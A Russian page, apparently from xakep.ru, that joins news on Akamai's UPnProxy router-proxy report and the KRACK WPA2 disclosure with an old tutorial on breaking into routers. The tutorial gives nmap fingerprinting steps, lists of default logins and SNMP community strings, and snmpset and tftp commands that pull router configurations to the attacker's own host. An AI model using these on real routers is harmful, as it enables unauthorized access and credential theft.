Более 65 000 роутеров проксируют трафик ботнетов и преступных групп. Уязвимости роутеров


Более 65 000 роутеров проксируют трафик ботнетов и преступных групп

Специалисты компании Akamai обнародовали отчет (PDF), в котором сообщили, что операторы ботнетов и кибершпионские группировки активно используют роутеры и протокол Universal Plug and Play (UPnP) для проксирования вредоносного трафика. Таким образом преступники скрываются от внимания экспертов и правоохранительных органов, «путая следы». Эксперты пишут, что так уже используются более 65 000 устройств, а еще более 4,8 млн потенциально уязвимы. Подобную вредоносную активность аналитики назвали UPnProxy.

Хотя небезопасность протокола UPnP была доказана довольно давно, он по-прежнему широко применяется для универсальной автоматической настройки сетевых устройств как локально, так и удаленно. Исследователи объясняют, что злоумышленники находят роутеры с уязвимыми и неправильно настроенными службами UPnP, так как зачастую маршрутизаторы доступны через WAN-интерфейс, а значит, из интернета. Чаще всего речь идет о «слабых» паролях и использовании брутфорса.

Через UPnP злоумышленники модифицируют таблицы NAT (Network Address Translation) и создают кастомые правила, позволяющие обращаться к публичному IP-адресу роутера по определенному порту, чтобы затем произошла автоматическая переадресация на другой IP-адрес и порт.

Это позволяет использовать скомпрометированные устройства как в роли прокси-серверов, так и обойти файрвол, добравшись до локальных устройств, расположенных за роутером. Кроме того, с помощью UPnProxy атакующие могут получить доступ к панели управления маршрутизатором, которая в нормальных обстоятельствах не должна быть доступна. Однако комбинация порта и IP-адреса, как на скриншоте выше, позволяет злоумышленникам обратиться к «запретному» внутреннему IP.

Специалисты Akamai предупреждают, что различные UPnP-службы доступны через WAN более чем на 4,8 млн устройств. По данным компании, компрометации с помощью UPnProxy подверглись как минимум 65 000 роутеров, однако обнаруживать такие устройства крайне сложно: нужно изучать таблицы NAT и почти в каждом случае связываться с владельцем девайса.

Также исследователи Akamai цитируют своих коллег из Symantec, недавно обнаруживших вредоносную кампанию Inception Framework. По мнению экспертов, технику UPnProxy уже использует APT-группировка, ответственная за эту кампанию, и возможно, это правительственные хакеры

В конце своего отчета специалисты Akamai приводят длинный список потенциально уязвимых перед данным вектором атак производителей и конкретных моделей маршрутизаторов. В него вошли 73 вендора и более 400 устройств. При этом исследователи предупреждают, что в теории для устранения проблемы понадобятся немалые усилия со стороны производителей, которым придется разработать и выпустить прошивки, изменяющие настройки UPnP, чтобы уязвимые службы не обнаруживались через WAN. А в настоящее время эксперты Akamai советуют пользователям, нашедшим среди потенциально проблемных моделей свои устройства, сменить роутер на другую модель, которой нет в списке.

Для проверки роутеров был создан специальный bash-скрипт. К сожалению, он будет практически бесполезен для рядовых пользователей, которые вряд ли умеют подключаться к своим устройствам посредством SSH и запускать такие скрипты.

Фото: Depositphotos

xakep.ru

Безопасность Wi-Fi под угрозой из-за множества обнаруженных в WPA2 уязвимостей

Интернет замер в ожидании релиза proof-of-concept эксплоита под названием KRACK (аббревиатура от Key Reinstallation Attacks). Дело в том, что в минувшие выходные стало известно, то сводная группа специалистов готовит скоординированное раскрытие информации о неких критических проблемах WPA2, которые позволяют обойти защиту и прослушивать Wi-Fi-трафик, передаваемый между точкой доступа и компьютером.

Формально исследователи расскажут о найденных ими уязвимостях лишь 1 ноября 2017 года, на конференции ACM CCS. На мероприятии будет представлен доклад, озаглавленный Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2 («Атака на реинсталляцию ключей: принудительное повторное использование nonce в WPA2»).

В состав группы, работавшей над созданием KRACK и взломом WPA2, вошли: Мэти Ванхоф (Mathy Vanhoef) и Фрэнк Писсенс (Frank Piessens) из Левенского католического университета, Малихех Ширванян (Maliheh Shirvanian) и Нитеш Саксена (Nitesh Saxena) из Алабамского университета в Бирмингеме, Ионг Ли (Yong Li) из компании Huawei Technologies, а также представитель Рурского университета Свен Шеге (Sven Schäge).

Однако ждать ноября нам все же не придется. Скоординированное раскрытие информации запланировано на сегодня, 16 октября 2017 года, и должно состояться во второй половине дня. Информация о KRACK появится на сайте krackattacks.com, также исследователи подготовили репозиторий на GitHub (пока тоже пустующий). О том, что информация будет опубликована 16 октября, сообщил в своем твиттере сам Мэти Ванхоф, причем первый «тизер» этого события он запостил еще 49 дней назад.

Что известно о KRACK уже сейчас? По данным ArsTechnica, US-CERT уже направил более чем 100 организациям следующее описание проблемы: в механизме управления ключами в четырехэлементном хендшейке Wi-Fi Protected Access II (WPA2) были найдены критические уязвимости. Эксплуатируя эти баги, можно добиться расшифровки трафика, осуществить HTTP-инжекты, перехват TCP-соединений и многое другое. Так как уязвимости были найдены на уровне протокола, проблемы затрагивают большинство имплементаций.

ИБ-специалист Ник Лоу (Nick Lowe), уже посвященный в суть проблемы, сообщил в Twitter, что уязвимостям были присвоены следующие идентификаторы CVE: CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, CVE-2017-13084, CVE-2017-13086, CVE-2017-13087 и CVE-2017-13088.

Также ArsTechnica ссылается на собственный источник и утверждает, что такие компании, как Aruba и Ubiquiti, поставляющие точки доступа крупным корпорациям и правительственным организациям, получили фору на устранение багов, и уже выпустили обновления.

Интересно, что минувшим летом, на конференции Black Hat Ванхоф и Писсенс представили доклад (PDF), посвященный поиску проблем в сетевых протоколах. Судя по всему, документ содержал намек на KRACK, к примеру, иллюстрация ниже показывает, что исследователи уже тогда внимательно изучали механизм работы хендшейков.

][ продолжит следит за развитием ситуации. Как только данные будут опубликованы, мы обязательно расскажем о KRACK подробнее.Пока можно сделать вывод, что если описание проблем не было преувеличено, то после сегодняшнего раскрытия информации, WPA2 более нельзя будет считать надежным, как это некогда произошло с WEP. Под ударом, вероятнее всего, окажутся миллионы сетевых устройств и их владельцы, а использования Wi-Fi придется избегать до выхода патчей. И если роутеры, скорее всего, получат обновления для этих потенциальных проблем, что произойдет с сонмом IoT-устройств, можно только догадываться.      

UPD.

Подробная информация опубликована. Продолжение новости здесь.

xakep.ru

Роутер - враг твой - «Хакер»

Порывшись в архивах статей на сайтах, связанных с сетевой безопасностью, яне нашел практически никакой информации посвященной роутерам (маршрутизаторам), а ведь этоявляется очень важной и неотъемлемой частью любой сети. По сему я решил написать данную статью,в которой я рассмотрю примеры определения удаленного роутера, определения типа ОС на которой онустановлен, наиболее часто встречающиеся пользователи по умолчанию и другие не маловажныеуязвимости. 

Определения роутера

Вам понадобиться порт сканнер (желательно nmap) и простой traceroute.Для примера будем использовать www.example.net. Начнем с определения IP адреса роутера, который является окном в интернет для www.example.net.Делается это так:

Для Unix:

bash# traceroute www.example.net 1 some.dns.001.com (*.*.*.1) 2.260 ms 1.911 ms 1.363 ms 2 some.dns.002.com (*.*.*.2) 3.952 ms 3.966 ms 4.297 ms 3 some.dns.003.com (*.*.*.3) 4.370 ms 9.422 ms 5.381 ms 4 some.dns.004.com (*.*.*.4) 12.176 ms 13.102 ms 13.050 ms 5 www.example.net (*.*.*.5) 43.755 ms 42.683 ms 42.612 ms

Для Windows NT:

В командной строке набираем ( для тех кто не знает : Start>Programs>Command Promt или Пуск>Программы>РежимMSDOS):

tracert www.example.net 

Получаем что-то типа этого:

1 160ms 190 ms 150ms some.dns.001.com *.*.*.1 2 310ms 421ms 275ms some.dns.002.com *.*.*.2 3 234ms 434ms 43ms some.dns.003.com [*.*.*.3] 4 910ms 324ms 432ms some.dns.004.com [*.*.*.4] 5 764ms 321ms 354ms www.example.net [*.*.*.5] 

Хотя на мой взгляд для Windows лучше воспользоваться какой-нибудьальтернативной программой у которой есть эта функция, например ShadowScan , WS Ping Pro ит.д. 

Как видно, конечной точкой переадресации пакетов является *.*.*.4 — это как раз и есть наш роутер, который будет рассматриваться в дальнейшем. 

Следующим шагом будет сканирования портов на данном адресе, для попытки определить на какие порты можно заглянуть для получения более подробной информации о том, с чем мы имеем дело. 

Для Unix:

bash# nmap -p1-170, 510-520, 2001, 4001, 6001, 7161, 9001 *.*.*.4

Для Windows возьми порт сканер из тех что я привел выше или любой другой и отсканируй порты, если хочешь можешь хоть все.Дальше я буду писать только для Unix как это делается для Windows я думаю уже понятно.

Вот таблица портов для некоторых роутеров:

Cisco routers

21(ftp) 0(tcpmux) 23(telnet) 49(domain) 79(finger) 67(bootpc) 80(http) 69(tftp) 512(exec) 123(ntp) 513(login) 161(snmp) 514(shell) 1993(Cisco snmp) 1999(Cisko ident) 2001 4001 6001 9001(xRemote service) 

Bay routers

21(ftp) 7(echo) 23(telnet) 9(discard) 67(bootpc) 68(bootpc) 69(tftp) 161(snmp) 520(route) 

Ascend routers

23(telnet) 7(echo) 9(discard) 161(snmp) 162(snmp-trap) 514(shell) 520(route) 

Кстати, на многих Cisco, при подключении на порт 23 и 2001, вы увидите приглашение типа: 

User Access Verification Password:

Допустим, мы определили тип роутера, но это еще только пол пути. Давайте рассмотрим кое-какие методы поиска информации об операционной системе. 

Cisco

1) на 13-ом порту, можно попробовать запустить nmap со следующими параметрами:

bash# nmap -O -p13 -n *.*.*.4

Если порт открыт появиться что-нибудь типа:

Remote operating system guess: Cisco Router

2) 2001, 4001, 6001 — являются виртуально терминальными портами,не всегда это может быть cisco. Проверить можно вписав в браузер: 

157.130.10.46:2001

если ответом будет нечто подобное:

User Access Verification Password: Password: Password: % Bad Password

то мы на правильном пути.

3) 9001 порт отвечает за xRemote service, запускающий xSessions. Подсоединившись на 9001 порт мы получим приглашение: 

— Out Bound Xremote srvice — Роутер Ascend

Любой желающий может прочитать содержимое MIB используя community stringread.

Роутер Bay

По умолчанию данные роутеры позволяют читать и изменять SNMP переменные. Для использования данной уязвимости можно войти в систему, используя имя пользователя по умолчанию и далее в приглашении ввести следующее: 

show snmp comm types

данная команда выведет все имена для записи и чтения :). 

Вот листинг read/write community names для SNMP используемых по умолчанию:

-public -write -cisco -all private -private -read -tivoli -openview -monitor -manager -security -default -password -network -community -secret -world -admin 

Ну что же, пришло время рассмотреть примеры проникновения на удаленный маршрутизатор.Ни для кого не секрет, что многие производители hardware по умолчанию устанавливаютаккаунты, используемые для администрирования и так называемого гостевого входа на роутер. В нашем же случае это можно назвать back door’ом. Зная тип маршрутизатора, можно попробовать ниже приведенные аккаунты для авторизации на роутер: 

Ниже я привел список дефолтовых паролей к некоторым устройствам:

Устройство Логин Пароль Права

Cisco enable cisco администратор 23(telnet) c [только для cisco 2600s] 23(telnet) cisco пользователь 23(telnet) cisco routers пользователь 

Bay router User [нет пароля] пользователь Manager [нет пароля] администратор Bay 350T switch NetICs NA администратор Bay SuperStack II security security администратор Shiva root [нет пароля] администратор Guest [нет пароля] пользователь WebRamp wradmin trancell администратор MotorolaCable cablecom router администратор3Comadmin synnet администратор manager manager администратор write synnet администратор debug synnet администратор tech tech пользователь monitor monitor пользователь read synnet пользователь

(полный список дефолтовых логинов вы безтруда можете найти в сети, например на Astalavist’е).

Хотите верьте, хотите нет, но данные аккаунты активированы на многих маршрутизаторах. Причиной как всегда является халатность администраторов, которые забывают, либо им лень поменять/удалить данные акаунты. Их, к сожалению, устраивает вариант «пока не поломают — не пофиксю». Определенно данный вариант устраивает не только его ;). 

Предлагаю плавно перейти на Сisco роутеры, которые на сегодняшний день являются самыми распространенными и зарекомендовавшими себя в деле. 

На cisco роутерах есть поддержка старой MIB, что позволяет любому с read/write community name скачать файлы конфигурации (которые хранят зашифрованые пароли) с помощью TFTP. Расшифровать пароли не составит особого труда, т.к. шифруется все XOR’ом. Для проверки роутера на уязвимость можно обратиться сюда www.solarwinds.net (здесь есть вся необходимая информация). 

Вот пример стягивания конфиг файла на UNIX машине:

snmpset *.*.*.4 private 1.3.6.1.4.1.9.2.1.55.[ваш tftp хост] s [file.config]

Как я уже упомянул, слабый алгоритм XOR позволит без труда расшифровать пароль. Во избежании этого советую проверить каким алгоритмом зашифрован пароль, для этого можно посмотреть в конфигурации: 

show config

Вариантом с XOR будет нечто похожее на это:

enable password 7 08204E

Кстати говоря, не только на Cisco возможен вариант загрузки файла конфигурации, вы можете просканировать ваш роутер на 69 порт — на котором возможно весит TFTP. Если результат окажетсяположительным, то можно попытаться выкачать файл конфигурации следующим образом: 

bash# tftp connect *.*.*.4 get [dns-name].cfg quit

Примером файла конфигурации был [dns-name], т.к. очень часто имя файла конфигурации совпадает с доменным именем маршрутизатора. 

Помимо всего того, что я перечислил в данной статье, существует множество других способов взятия контроля над роутером такие как: dsniff, ARP переадресация, RIP spoofing — 

Может и о этом напишу, а на сегодня хватит Пока.

xakep.ru


Смотрите также